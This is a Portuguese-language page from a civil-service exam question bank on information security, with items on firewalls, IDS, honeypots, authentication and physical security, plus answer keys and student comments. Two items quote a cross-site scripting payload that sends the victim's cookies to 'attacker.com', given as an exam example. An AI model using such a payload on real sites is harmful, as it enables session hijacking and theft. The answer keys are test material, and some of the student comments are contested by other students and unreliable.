    As configurações de Firewall envolvem REGRAS e não assinaturas constantes e automatizadas (como Antivírus)!

    São ferramentas de segurança capazes de detectar e evitar ataques provenientes de uma comunicação em rede!

    ☛ a Filtragem de Pacotes, NAT (Network Address Translation) e Serviços Proxy são módulos FUNDAMENTAIS do Firewall

    [...]

    UTILIDADES:

    É utilizado para bloquear acessos a determinados sítios ou endereços

    Usado para controlar os pacotes que entram e que saem da rede interna

    Aprovar pacotes de dados que atendem as exigências e bloquear os demais

    -

    Segundo a CESPE:

    "Um firewall serve, basicamente, para filtrar os pacotes que entram e(ou) saem de um computador e para verificar se o tráfego é permitido ou não."

    [...]

    MODO DE FUNCIONAMENTO:

    Utiliza filtro de endereçamento;

    Utiliza criptografia e autenticação;

    É dispensável o uso de equipamento de hardware na máquina.

    [...]

    Questões Cespianas:

    1} Um firewall é um software que realiza análises do fluxo de pacotes de dados, filtragens e registros dentro de uma estrutura de rede e executa comando de filtragem previamente especificado com base nas necessidades de compartilhamento, acesso e proteção requeridas pela rede e pelas informações nela disponíveis. (CERTO)

    2} Convém que todo o tráfego da rede passe por firewall, uma vez que a eficácia da segurança proporcionada por esse dispositivo será comprometida caso existam rotas alternativas para acesso ao interior da referida rede. (CERTO)

    3} Um firewall filtra o tráfego de entrada e saída entre a rede interna e a externa. (CERTO)

    [...]

    ____________

    Fontes: cartilha.cert.br; Questões da CESPE e Instituto AOCP; Colegas do QC e Projetos Missão.

  • kakuzu, desculpe discordar mas a questão não é PAVOROSA! e banca não formulou mal a questão.. rlx todo erro é uma nova aprendizagem, só não pare NUNCA

ID
3391426
Banca
AOCP
Órgão
UNIR
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Segurança da informação é o conjunto de orientações, normas, procedimentos, políticas e demais ações que tem por objetivo proteger o recurso informação, possibilitando que o negócio da organização seja realizado e a sua missão seja alcançada. A segurança da informação existe para minimizar os riscos do negócio em relação à dependência do uso dos recursos de informação para o funcionamento da organização. Sem a informação ou com uma incorreta, o negócio pode ter perdas que comprometam o seu funcionamento e o retorno de investimento dos acionistas. Em relação às Políticas de Segurança, julgue, como VERDADEIRO ou FALSO, o item a seguir.

Quanto à identificação em um sistema computacional, essa informação deve ser sigilosa. No ambiente computacional, o usuário é identificado por alguma informação que sabe (senha), possui (cartão, token) ou é (característica física-biometria).

Alternativas
Comentários
  • Cara... matutei, matutei e matutei e descobri o porquê que eu errei a questão (pelo menos acho que descobri).

    A primeira vista, pareceu uma questão bem óbvia, mas quando errei, fui pesquisar um pouco mais...

    Achei isso aqui "Quanto à autenticação, a informação deve ser sigilosa. No sistema computacional, você é autenticado por alguma informação que você̂ saiba."

    Então eu ACHO que o erro da questão está em dizer que "Quanto à identificação em um sistema computacional, essa informação deve ser sigilosa"

    Enfim, se alguém souber o erro da questão, ajuda a gente aqui!

    FONTE: https://simulado.estacio.br/bdq_simulados_exercicio_preview.asp?cod_prova=3777949137&cod_hist_prova=189359710&pag_voltar=otacka#:~:text=I%2DA%20identifica%C3%A7%C3%A3o%20informa%20ao,que%20est%C3%A1%20acessando%20a%20informa%C3%A7%C3%A3o.&text=III%2DQuanto%20%C3%A0%20autentica%C3%A7%C3%A3o%2C%20a,alguma%20informa%C3%A7%C3%A3o%20que%20voc%C3%AA%CC%82%20saiba.

    Questão 4!

    Bons estudos.

  • Senhas: fraca (até 4 dígitos), média (4 – 6 dígitos) e alta/forte (8 – 16 dígitos). Algumas

    características que as senhas precisam ter: alfanumérica (letras e números), case-sensitive

    (diferenciação entre letras maiúsculas e minúsculas), evitar placas de carros, datas

    comemorativas, repetição de caracteres, troca periódica da senha etc.

    Senha faz parte do grupo: aquilo que você sabe;

    Biometria: física – digital, Iris, veias da palma da mão, face, odor), comportamental

    – voz, caminhado, assinatura digitalizada e digitação.

    Biometria faz parte do grupo: aquilo que você é.

    A questão diz que (cartão, token) e (característica física-biometria) faz parte do grupo aquilo que você sabe.

    Gab: E

  • GABARITO: ERRADO.

  • Questão horrorosa, na banca aocp você precisa conhecer "trechos de textos da internet", o assunto fica em segundo plano.

  • acredito que o erro da afirmativa é referente autenticação e não identificação.

ID
3392977
Banca
INSTITUTO AOCP
Órgão
UFOB
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Para alguns especialistas, a informação é considerada o ativo mais valioso das organizações. A segurança física e lógica, no que diz respeito à proteção das informações, é preocupação dos profissionais da Segurança da Informação. Sobre esse assunto, julgue o item a seguir.

Não é papel do usuário do computador se preocupar com a segurança da informação, quando uma organização possui uma equipe dedicada a tratar exclusivamente desse assunto.

Alternativas
Comentários
  • Adianta nada a organização gastar muitos dinheiros pra deixar o trem seguro se o usuário não colaborar. Elementar

  • Ai e triste

  • Assertiva E

    Não é papel do usuário do computador se preocupar com a segurança da informação, quando uma organização possui uma equipe dedicada a tratar exclusivamente desse assunto.

  • O usuário é a maior ameaça kkkkkkk.

  • os usuários são os principais responsáveis por seguir e implementar as regras e mecanismos de segurança da informação...

  • De acordo com a ISO 27002, usuários são parte da segurança da informação, inclusive há tópicos relacionados a: processo disciplinar em caso de descumprimento da PSI e o de "conscientização, educação e treinamento em sI".

  • GABARITO: ERRADO.


ID
3392980
Banca
INSTITUTO AOCP
Órgão
UFOB
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Para alguns especialistas, a informação é considerada o ativo mais valioso das organizações. A segurança física e lógica, no que diz respeito à proteção das informações, é preocupação dos profissionais da Segurança da Informação. Sobre esse assunto, julgue o item a seguir.


O firewall é o primeiro sistema de detecção de intrusão que deve ser instalado no perímetro da rede de computadores de uma organização, ou seja, entre a rede local e a Internet.

Alternativas
Comentários
  • O erro da afirmativa está no trecho "sistema de detecção de intrusão", uma vez que o Firewall não faz detecção de intrusão, mas permite ou nega a entrada ou saída de pacotes de acordo com as regras configuradas. O IDS (Intrusion Detection System) é o sistema de detecção de intrusão.

    GABARITO: E

  • Firewall é uma coisa, IDS é outra.

  • Gabarito: Errado

    ⚜️ O conceito da questão é referente ao IDS

  • Firewall # IDS
  • neste caso, o sistema IDS através do NIDS irá agir nesse momento.

  • BORA BORA, depen a vaga é minha!

  • Firewall != IDS = true

  • GABARITO: ERRADO.

  • Intrusion Detection System (IDS)

    ➥ Do Português - Sistema de Detecção de Intrusão - é um sistema que possibilita a coleta e o uso de informações dos diversos tipos de ataques em prol da defesa de toda uma infraestrutura de rede.

    ➥ Em outras palavras, é um software que automatiza o processo de detecção de intrusão.

    [...]

    ► Pra que ele serve?

    É usado para monitorar e proteger redes detectando atividades mal-intencionadas e relatando-as a um grupo ou contato, como um administrador de rede. Uma vez que as atividades desse tipo são detectadas, um administrador é alertado.

    [...]

    ► Como ele funciona?

    O sistema analisa o tráfego da rede em busca de assinaturas que correspondam a ciberataques conhecidos.

    ➥ Além disso, compara flags definidas em um cabeçalho TCP com boas e más combinações conhecidas de flags.

    [...]

    ► Onde ele deve ser instalado?

    IDS é o primeiro sistema de detecção de intrusão que deve ser instalado no perímetro da rede de computadores de uma organização, ou seja, entre a rede local e a Internet.

    ____________

    Fontes: Universidade Federal do RJ; Questões da CESPE; Colegas do QC.

  • ERRADO

    não faz detecção de intrusão, mas permite ou nega a entrada ou saída de pacotes de acordo com as regras configuradas.

    • quem entra em ação é o antivírus (polícia) o firewall (porteiro) simplesmente pode não autorizar o tráfego para dentro da rede (o porteiro bloqueia a porta, a polícia entra em ação)


ID
3501001
Banca
FAUEL
Órgão
Câmara Municipal de Colombo - PR
Ano
2019
Provas
Disciplina
Segurança da Informação
Assuntos

Analise as seguintes afirmativas sobre segurança física e lógica:


I- A segurança lógica controla o acesso a aplicativos, dados, sistemas operacionais, senhas e arquivos de log por meio de firewalls de hardwares e softwares, criptografia, antivírus e outras aplicações contra hackers e possíveis invasões às fontes internas da empresa.

II- A segurança física trata de métodos para evitar o acesso de pessoas não autorizadas a áreas em que se encontram dados e informações críticas da empresa. Uma forma de fazer isso é implantar recursos de identificação de funcionários, como o uso de crachás, senhas e cadastro de digitais.

Alternativas
Comentários
  • ✅ Gabarito C

    ➤  Controles Físicos: são barreiras que impedem ou limitam o acesso físico direto às informações ou à infraestrutura que contém as informações. Ex: portas, trancas, paredes, blindagem, vigilantes, geradores, sistemas de câmeras, alarmes, catracas, cadeados, salas-cofre, alarmes de incêndio, crachás de identificação, entre outros.

    Controles Lógicos: também chamados de controles técnicos, são barreiras que impedem ou limitam o acesso à informação por meio do monitoramento e controle de acesso a informações e a sistemas de computação. Ex: senhas, firewalls, listas de controle de acesso, criptografia, biometria, IDS, IPS, entre outros.

  • Não concordo com a resposta da banca!

    Na alternativa II ele menciona " ...senhas e cadastro de digitais" estes fatores estão ligados as credenciais de acesso que é algo ligado a segurança Lógica da informação.

    Creio que se a banca não tivesse escrito o uso de senhas e cadastro de digitais a afirmativa II estaria correta.

  • Questão copiada desse site

    https://blogbrasil.westcon.com/qual-a-diferenca-entre-seguranca-fisica-e-seguranca-logica


ID
3563023
Banca
IBFC
Órgão
TRE-AM
Ano
2013
Disciplina
Segurança da Informação
Assuntos

Existem tecnicamente mecanismos de Segurança de Informação que apoiam os controles lógicos tais como:

(1) Assinatura digital.
(2) Mecanismos de encriptação.
(3) Mecanismos de certificação.

Estão corretas as afirmativas:

Alternativas
Comentários
  • Alguém pode me salvar??

  • Gabarito C para não.assinantes.


ID
3597466
Banca
FCC
Órgão
TCE-PA
Ano
2009
Disciplina
Segurança da Informação
Assuntos

A biometria se refere a várias técnicas de autenticação, para distinguir um indivíduo do outro, baseando-se nas características

Alternativas
Comentários
  • Gabarito: C)


ID
4115086
Banca
IDECAN
Órgão
DETRAN-RO
Ano
2014
Provas
Disciplina
Segurança da Informação
Assuntos

“Ataques que monitoram luz, som, rádio ou outros sinais para detectar comunicações ou computações.” Com base na segurança física, definida de modo geral como o uso de medidas físicas para proteger valores, informação ou acessar recursos restritos, a afirmativa anterior refere-se a

Alternativas
Comentários
  • comentário do professor?

  • GABARITO E

    intromissão (eavesdropping).

    Eavesdropping (computadores) é uma técnica de hacking que se baseia na violação da confidencialidade, onde um atacante através de recursos tecnológicos, aproveitando de vulnerabilidades nas comunicações de possíveis vitimas, faz um monitoramento sem autorização nesta comunicação, podendo roubar dados e informações que poderão ser usadas posteriormente.

    Wikipedia

  • Eu nunca vou entender essa banca... Por que a B está errada?

  • Alguma fonte renomada? autor? livro, base teórica confiável?


ID
4849828
Banca
CESPE / CEBRASPE
Órgão
Ministério da Economia
Ano
2020
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue o próximo item, a respeito de criptografia, ataque a rede de computadores e segurança de servidores e de estações de trabalho.


Honeypot é uma técnica pela qual um atacante utiliza um equipamento conectado à rede de computadores para tirar de operação um serviço, um computador ou toda uma rede conectada à Internet.

Alternativas
Comentários
  • Honeypot é uma ferramenta que tem a função de propositalmente simular falhas de segurança de um sistema e colher informações sobre o invasor. É uma espécie de armadilha para invasores. O honeypot não oferece nenhum tipo de proteção.

    ERRADO

  • GABARITO ERRADO!

    Honeypot é uma ferramenta ou sistema criado com objetivo de enganar um atacante e fazê-lo pensar que conseguiu invadir o sistema, quando na realidade, ele está em um ambiente simulado, tendo todos os seus passos vigiados.

    Kapersky Antivírus

    CESPE - 2010 - ABIN - Oficial Técnico de Inteligência

    A detecção de intrusão pode ser realizada por meio do uso de honeypots, técnica que atrai o atacante para um ambiente não crítico, onde há informações falsas e aparentemente valiosas, encorajando-o a permanecer nesse ambiente o tempo suficiente para que os administradores possam registrar e rastrear seu comportamento.

    CORRETO!

  • GAB: ERRADA

    A questão trata é da Negação de serviço, ou DoS (Denial of Service), é uma técnica pela qual um atacante utiliza um equipamento conectado à rede para tirar de operação um serviço, um computador ou uma rede conectada à Internet.

    Honeypot (em português: “Pote de Mel”) é um recurso disponibilizado propositalmente (como armadilha) em uma rede para ser comprometido ou atacado, com o objetivo de rastrear as atividades de hackers na rede ou até mesmo servir apenas como distração, poupando o serviço verdadeiro.

    Ele pode funcionar tanto antes do firewall, com depois, ou até mesmo dentro de uma .

    Mais :

    (CESPE - 2010 - ABIN - Oficial Técnico de Inteligência) A detecção de intrusão pode ser realizada por meio do uso de honeypots, técnica que atrai o atacante para um ambiente não crítico, onde há informações falsas e aparentemente valiosas, encorajando-o a permanecer nesse ambiente o tempo suficiente para que os administradores possam registrar e rastrear seu comportamento. CERTA

    (CESPE/2018-ABIN) Os honeypots (potes de mel), enquanto tecnologia de detecção de intrusão, podem ser utilizados para atingir os objetivos de atrair um atacante potencial e afastá-lo de sistemas críticos e de incentivar o atacante a ficar no sistema por período de tempo suficiente para que haja resposta dos administradores, mas não para coletar informações sobre a atividade do atacante, uma vez que não foram projetados para esse fim. ERRADA

    (CESPE / CEBRASPE - 2020 - Ministério da Economia - Tecnologia da Informação) Um ataque DDoS que utiliza protocolo DNS caracteriza-se por usar servidores de nomes para transformar consultas pequenas em cargas úteis muito maiores na resposta redirecionada à vítima. CERTA

  • Honeypot é um tipo de armadilha, uma "vulnerabilidade" usada para atrair atacantes.

  • Honeypot "pote de mel", é uma armadilha para o invasor cair e dar tempo de ser estudado, normalmente se utiliza em uma máquina que não tenha acesso a nenhum dado importante da organização.

  • Gabarito: Errado.

    Honeypot é um "pote de mel" para atrair "ursos" e descobrir quais são suas armas e, assim, a organização saberá como melhor se proteger. Buscam ludibriar o adversário, que não sabe que seus passos estão sendo totalmente monitorados. É de grande importância em ambientes onde técnicas inovadoras precisam ser detectadas e aprendidas.

  • GABARITO: ERRADO.

  • Honeypot é uma ferramenta que simula falhas de segurança, para enganar os invasores (abextados) de redes.

    Conhecido como o "POTE de MÉL" Assim as organizações saberão como se dibriar e estudar esses tipos de (abextados.)

  • Honeypot (pote de mel)

    Pode ser considerado uma técnica, ferramenta ou programa

    São criadas falhas intencionais para atrair atacantes

    Sua ação é simular falhas na segurança

    Cria armadilhas para capturar invasores, após a captura pode colher informações sobre o invasor

    Também utilizada para aliviar a constância de ataques a um sistema

    Fonte: Professor Rani passos

  • ERRADO

    Negação de serviço, ou DoS (Denial oService), é uma técnica pela qual um atacante utiliza um computador para tirar de operação um serviço, um computador ou uma rede conectada à Internet. Quando utilizada de forma coordenada e distribuída, ou seja, quando um conjunto de computadores é utilizado no ataque, recebe o nome de negação de serviço distribuído, ou DDoS (Distributed Denial of Service).

    Fonte: https://cartilha.cert.br/ataques/

  • Honeypots (pote de mel) são utilizados para desviar a atenção de atacantes de sistemas críticos da organização.

    Para isso um equipamento com várias vulnerabilidades é colocado entre os outros.

    Ele serve também para adquirir conhecimentos sobre os ataques e para alertar o administrador da rede sobre o ataque.

    Professor Jósis Alves.

    Instagram josisalvesprof

  • Negação de serviço, ou DoS (Denial of Service), é uma técnica pela qual um atacante utiliza um computador para tirar de operação um serviço, um computador ou uma rede conectada à Internet. Quando utilizada de forma coordenada e distribuída, ou seja, quando um conjunto de computadores é utilizado no ataque, recebe o nome de negação de serviço distribuído, ou DDoS (Distributed Denial of Service).

    Fonte: https://cartilha.cert.br/ataques/

  • Honeypot (pote de mel)

    Pode ser considerado uma técnica, ferramenta ou programa

    São criadas falhas intencionais para atrair atacantes

    Sua ação é simular falhas na segurança

    Cria armadilhas para capturar invasores, após a captura pode colher informações sobre o invasor

    Também utilizada para aliviar a constância de ataques a um sistema

    Fonte: Professor Rani passos

  • HONEYPOT-------> POTE DE MEL-----> O MEL É "PEGAJOSO"-----> ELE "PEGA" O ATACANTE!

  • ALELUIA. ALGUMA QUESTÃO QUE EU SEI DE FATO. KKKK

  • em termos de segurança do computador, um honeypot virtual funciona de forma semelhante, atraindo os hackers para uma armadilha. É um sistema de computador sacrificial que pretende atrair ciberataques, como uma emboscada. Ele emula um alvo para os hackers e usa suas tentativas de intrusão para obter informações sobre cibercriminosos e a maneira como eles estão operando ou para distraí-los de outros alvos.

    https://www.kaspersky.com.br/resource-center/threats/what-is-a-honeypot

  • Gab: Errado.

    Outra questão:

    Q1140181 - É uma técnica pela qual um atacante utiliza um computador para tirar de operação um serviço, um servidor, um computador ou uma rede conectada à Internet. O objetivo desses ataques não é invadir e nem coletar informações, mas sobrecarregar o alvo com a finalidade de torná-lo indisponível. A que o enunciado se refere?

    D) DoS (Denial of Service).

    insta: @daniconcurseira

  • Um honeypot virtual funciona de forma semelhante, atraindo os hackers para uma armadilha. É um sistema de computador sacrificial que pretende atrair ciberataques, como uma emboscada. Ele emula um alvo para os hackers e usa suas tentativas de intrusão para obter informações sobre cibercriminosos e a maneira como eles estão operando ou para distraí-los de outros alvos.

  • Gabarito: ERRADO

    Honeypot: técnica usada para atrair hackers, como se fosse uma isca, dai o nome "pote de mel".

    A descrição da assertiva refere-se ao DoS (Denial of Service).

  • Honeypot é uma vulnerabilidade proposital para atrair o atacante e desviar sua atenção dos servidores e recursos importantes.

    Além disso, vale mencionar que essa técnica utilizada para atrair o atacante para determinado lugar, permite identificar o invasor, por onde ele entrou no sistema, qual era o seu alvo, dentre outros. Quanto mais tempo o invasor permanecer lá, mais informações serão possíveis coletar.

     Honeypot (em português: “Pote de Mel”) é um recurso disponibilizado propositalmente (como armadilha) em uma rede para ser comprometido ou atacado, com o objetivo de rastrear as atividades de hackers na rede ou até mesmo servir apenas como distração, poupando o serviço verdadeiro.

    Honeypot: técnica usada para atrair hackers, como se fosse uma isca, dai o nome "pote de mel".


ID
4849855
Banca
CESPE / CEBRASPE
Órgão
Ministério da Economia
Ano
2020
Provas
Disciplina
Segurança da Informação
Assuntos

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Alternativas
Comentários
  • CERTO

    Quebra de autenticação: se caracteriza quando a aplicação apresenta falhas em áreas como a saída de sessão (logout), gestão de palavras chave, expiração de sessões, sistemas do tipo “lembre- me”, questões secretas e atualizações de conta.

    Dentro do universo de autenticação e gerenciamento de sessões essas funções são consideradas menos importantes e, por essa razão, as mais atacadas. 

    Além das formas elencadas na questão, outra opção de prevenção é a autenticação em dois fatores, adotada pelo Google, por exemplo.

  • Assertiva C

    Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

    Ataque força Bruta

  • GABARITO: CERTO.

  • Basta recordar do seu celular ou cartão de credito, se uma pessoa erra varias vezes seguidas a senha, ele bloqueia o acesso.

    Ferramenta muito comum nos dias atuais.

  • Existem questões que querem aterrorizar o candidato. Nesta questão, nem vi o texto e acertei, mas se tivesse visto o texto antes de responder, daria uma sensação de derrota.

  • Quem nunca fez isso no celular do amigo, pra deixar ele sem celular por uns minutinhos... kkkk

  • Prevenir é uma palavra muito abrangente.. não tem referencia para comprovar esse tipo de informação.

  • Como que não justifica?

    Ataque de força bruta é o mesmo de você ficar tentando um monte de combinação. Ex: Você quer desbloquear o celular da sua mãe, você vai ficar tentando data de nascimento, cpf, data de nascimento do filho, do papagaio, até uma hora você acertar.

    Mas se aquele celular limitar, não tem como você tentar 30 vezes né.

    E se atrasar e avisar o usuário, sua mãe descobrirá e jaá vai vir te enquadrar

  • ataque de força bruta -> o atacante tenta advinhar o nome de um usuário ou senha por TENTATIVA/ERRO.

    Como ? Geralmente por meio do dicionário.

  • Têm regras de seguranças como firewall, iptables, caso usuário erre a senha mais de três vezes, o sistema trava e, depois de uma hora, o usuário tenta novamente o acesso. Isso é atrasar progressivamente a operação. Com isso, o administrador da rede analisa um possível ataque.


ID
4849858
Banca
CESPE / CEBRASPE
Órgão
Ministério da Economia
Ano
2020
Provas
Disciplina
Segurança da Informação
Assuntos

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Alternativas
Comentários
  • CERTO

    Você provavelmente não guarda suas economias debaixo do colchão. A maioria das pessoas mantém seu dinheiro em um ambiente confiável, geralmente um banco, e usam métodos independentes para autorizar e autenticar pagamentos.

    A segurança de APIs é assim. É necessário ter um ambiente confiável com políticas de autenticação e autorização.

    Algumas das maneiras mais comuns de fortalecer a segurança de APIs são:

    -Usar tokens

    -Criptografia e assinaturas

    -Identificar vulnerabilidades

    Definição

    API: nada mais é do que uma forma de comunicação entre sistemas. O professor Rani dá um excelente exemplo para lembrar o que é API. Aplicativos como Uber, iFood... usam a API Google Maps. Eles não lançam um satélite para fazer novos mapas. Usam um serviço que já existe e colocam dentro do aplicativo.

  • GABARITO: CERTO.

  • GABARITO: C

  • CERTO

    CONCEITO - O QUE É API? CESPE (2018) Em geral, APIs são definidas por um conjunto de requisitos que gerenciam a forma como uma aplicação pode conversar com outra aplicação. Devido às características de uma API, a separação entre ela e sua implementação permite que programas escritos em uma linguagem usem bibliotecas escritas em outra linguagem.

    NA PRÁTICA - COMO FUNCIONA? Quando uma pessoa acessa uma página de um hotel, por exemplo, é possível visualizar dentro do próprio site o mapa do Google Maps para saber a localização do estabelecimento e verificar qual o melhor caminho para chegar até lá. Esse procedimento é realizado por meio de uma API, onde os desenvolvedores do site do hotel utilizam do código do Google Maps para inseri-lo em um determinado local de sua página.

    .

    Outro conceito importante é o de Interoperabilidade é a capacidade de um sistema (informatizado ou não) de se comunicar de forma transparente (ou o mais próximo disso) com outro sistema (semelhante ou não).

    .

    FONTE: Canaltech, Qconcursos e Blog Vertigo.

  • Qual o problema desse pessoal que comenta "GABARITO: C" ?

  • Esses exemplos do dia a dia são os melhores, porque se faz a associação por meios conhecidos e dificilmente esquece. Daí aplica de forma simples e lembrará sempre.

  • Famosa questão Chicó: "Não sei como foi, só sei q foi assim"!!!

    O tipo de questao q vc sabe q tá certa, só não consegue justificar com fonte confiavel!!!

  • Classifiquei minha informaçao como secreta e transmiti em texto claro. pra Cespe tá certo
  • SEGURANÇA FÍSICA E LÓGICA

    Segurança física é a forma de proteger equipamentos e informações contra usuários que não possuem autorização para acessá-los.

    Enquanto segurança lógica é um conjunto de recursos executados para proteger o sistema, dados e programas contra tentativas de acessos de pessoas ou programas desconhecidos.

    ______

    Fonte: Blog Brasil.

  • gab certo.

    Criticidade: Atributo da segurança da informação que define a importância da informação para a continuidade do negócio da instituição.;


ID
4898653
Banca
MS CONCURSOS
Órgão
GHC-RS
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

A gestão da segurança da informação pode ser classificada em três aspectos: tecnológicos, físicos e humanos.
I- Camada Física: é o ambiente onde está instalado fisicamente o hardware – computadores, servidores, meio de comunicação – podendo ser o escritório da empresa, a fábrica ou até a residência do usuário no caso de acesso remoto ou uso de computadores portáteis.
II- Camada Lógica: é caracterizada pelo uso de hardwares, responsáveis pela funcionalidade dos outros hardwares, pela realização de transações em base de dados organizacionais, criptografia de senhas e mensagens etc.
III- Camada Humana: é formada por todos os recursos humanos presentes na organização, principalmente os que possuem acesso aos recursos de TI, seja para manutenção ou uso. As ferramentas de controle são, em sua maior parte, “invisíveis” aos olhos de pessoas externas aos ambientes de informática; estas só os reconhecem quando têm o seu acesso barrado pelo controle de acesso.
Diante do exposto, pode-se afirmar que:

Alternativas

ID
4898656
Banca
MS CONCURSOS
Órgão
GHC-RS
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

É uma característica da Camada Física de Segurança da Informação:

Alternativas

ID
5223022
Banca
IDHTEC
Órgão
Prefeitura de Maragogi - AL
Ano
2019
Provas
Disciplina
Segurança da Informação
Assuntos

O uso dos softwares de recuperação de dados pode ser de grande ajuda para resgatar alguns dados que tenham sido perdidos nesse processo.

Trata(m)-se de desvantagem (ns) do método:

I. Alto custo
II. Baixa garantia de sucesso
III. Alguns dos arquivos recuperados podem vir corrompidos

Alternativas

ID
5304037
Banca
SELECON
Órgão
EMGEPRON
Ano
2021
Provas
Disciplina
Segurança da Informação
Assuntos

No que diz respeito à segurança física de equipamentos de informática, três dispositivos devem ser instalados na entrada da alimentação elétrica de equipamentos de informática, particularmente os servidores de rede. As características de dois desses dispositivos são:
I. É o equipamento mais simples, que exerce sua função impedindo que flutuações na corrente elétrica passem diretamente ao sistema causando danos. Nesse dispositivo, o fusível é a única proteção existente. Em caso de uma brusca oscilação de energia ou mesmo queda, o fusível queima e esse dispositivo se sacrifica no lugar do equipamento sob proteção.
II. É o equipamento que busca manter a voltagem fornecida pela concessionária de energia elétrica em níveis próximos ao valor nominal. A função é manter a alimentação da carga o mais próximo possível da nominal (110/127V ou 220V).
Os dispositivos de proteção descritos em I e II são denominados, respectivamente:

Alternativas
Comentários
  • resposta letra D

    pra quem marcou a letra B, o nobreak possui bateria interna, em caso de queda de energia ele vai funcionar como fonte de energia, então não é um equipamento simples.

  • O "x" da questão é a descrição:

    I. É o equipamento mais simples...

    O nobreak é o equipamento mais completo em relação ao filtro de linha e estabilizador.


ID
5329186
Banca
Aeronáutica
Órgão
CIAAR
Ano
2021
Provas
Disciplina
Segurança da Informação
Assuntos

Apesar de muitas organizações ainda pensarem em segurança informática como simples antivírus ou gestão de logins, a segurança da informação nos dias de hoje é algo muito mais complexo, que abrange muitos aspectos.


A esse respeito avalie os aspectos relativos à segurança da informação.


I. Agir na segurança física e lógica de todos os recursos existentes dentro da organização.

II. Eliminar equipamentos, sejam eles computadores, servidores, equipamentos de rede ou meramente dados.

III. Pensar na prevenção de falhas, quer criando redundância dos sistemas, quer através de sistemas que facilitem a recuperação após as falhas.

IV. Considerar a importância da segurança informática da mesma forma da segurança de outros bens como documentos, dinheiro etc.


Está correto apenas o que se afirma em 

Alternativas
Comentários
  • GABARITO C

    A segurança informática é sem dúvida uma das áreas mais importantes numa organização e deve ser vista com a mesma atenção com que se olha para a segurança de outros bens (documentos, dinheiro, equipamento, etc.)

    Apesar de muitas organizações ainda pensarem em segurança informática como simples antivírus ou gestão de logins, a segurança da informação nos dias de hoje é algo muito mais complexo, que abrange muitos aspectos. Hoje a equipe informática deve pensar (e agir) na segurança física e lógica de todos os recursos existentes dentro da organização, em proteção dos equipamentos, sejam eles computadores, servidores, equipamentos de rede ou meramente dados, e na prevenção de falhas, quer criando redundância dos sistemas, quer através de sistemas que facilitem a recuperação após as falhas

    FONTE: ORGANIZAÇÕES E SEGURANÇA INFORMÁTICA Por Nuno Carvalho


ID
5362708
Banca
Quadrix
Órgão
CREFITO-4° Região (MG)
Ano
2021
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue o item acerca dos mecanismos de segurança da informação.

As técnicas de substituição são utilizadas pelas máquinas de rotor, que são dispositivos de hardware sofisticados, anteriores ao computador.

Alternativas
Comentários
  • Momento história na TI:

    Na criptografia, uma máquina de rotor é um dispositivo de cifra de fluxo eletromecânico usado para criptografar e descriptografar mensagens. As máquinas de rotor foram o estado da arte criptográfico por um período proeminente da história; eles foram amplamente utilizados nas décadas de 1920 e 1970. Wikipedia (inglês).

  • “As máquinas de rotor são dispositivos de hardware sofisticados, anteriores ao computador, que utilizam técnicas de substituição.” (STALLING, 2008). 

    CERTO

  • Vejam o filme "O jogo da imitaçao"


ID
5477671
Banca
CESPE / CEBRASPE
Órgão
BANESE
Ano
2021
Provas
Disciplina
Segurança da Informação
Assuntos

No que se refere a trabalho remoto, rotinas de segurança da informação e recuperação de arquivos, aplicativos para segurança e conformidade, julgue o item subsecutivo.


Recomenda-se a utilização de dois ou mais tipos de software de controle contra malware, durante manutenções e procedimentos de emergência, para aumentar a eficácia no que se refere à proteção contra ameaças.

Alternativas
Comentários
  • ERRADO. "Evite executar simultaneamente diferentes programas antimalware (eles podem entrar em conflito, afetar o desempenho do computador e interferir na capacidade de detecção um do outro); "

    Fonte: Cartilha de segurança

  • Evite executar simultaneamente diferentes programas antimalware..., contudo, a ISO 27002 orienta no sentido contrário: A utilização de dois ou mais tipos de software de controle contra malware de diferentes fornecedores e tecnologias no ambiente de processamento da informação pode aumentar a eficácia na proteção contra malware.

    E está é a LEI do concurso!

    Bjus pra tia Lea!

  • A lógica de quanto mais, melhor não serve aqui -- por exemplo, dois antivírus instalados numa mesma maquina, um interferiria o outro, ou seja, mais atrapalha do que ajuda

  • Se usar mais de um, eles podem entrar em conflito.

  • Fui buscar no edital para saber se a NBR ISO/IEC 27002:2013 foi cobrada, porque ela diz o contrário, conforme Bruno Aprígio comentou.

    "12.2.1

    Informações adicionais

    A utilização de dois ou mais tipos de software de controle contra malware de diferentes fornecedores e tecnologias no ambiente de processamento da informação pode aumentar a eficácia na proteção contra malware.

    Convém que seja tomado cuidado para proteção contra a introdução de malware durante manutenções e procedimentos de emergência, os quais podem ultrapassar os controles comuns de proteção contra malware."

    Creio que essa contradição de informações entre a NBR ISO/IEC e a Cartilha de Segurança prejudica o julgamento correto. A questão deveria ter sido anulada.

  • Um pode querer ser MAIS que o outro e sair no BRAÇO!

    Apenas um software.


ID
5605729
Banca
FGV
Órgão
Banestes
Ano
2021
Provas
Disciplina
Segurança da Informação
Assuntos

O conceito de hardening caracteriza-se principalmente por medidas e ações que visam:

Alternativas
Comentários
  • mapear ameaças, mitigar riscos e tornar sistemas computacionais preparados para enfrentar tentativas de ataque;

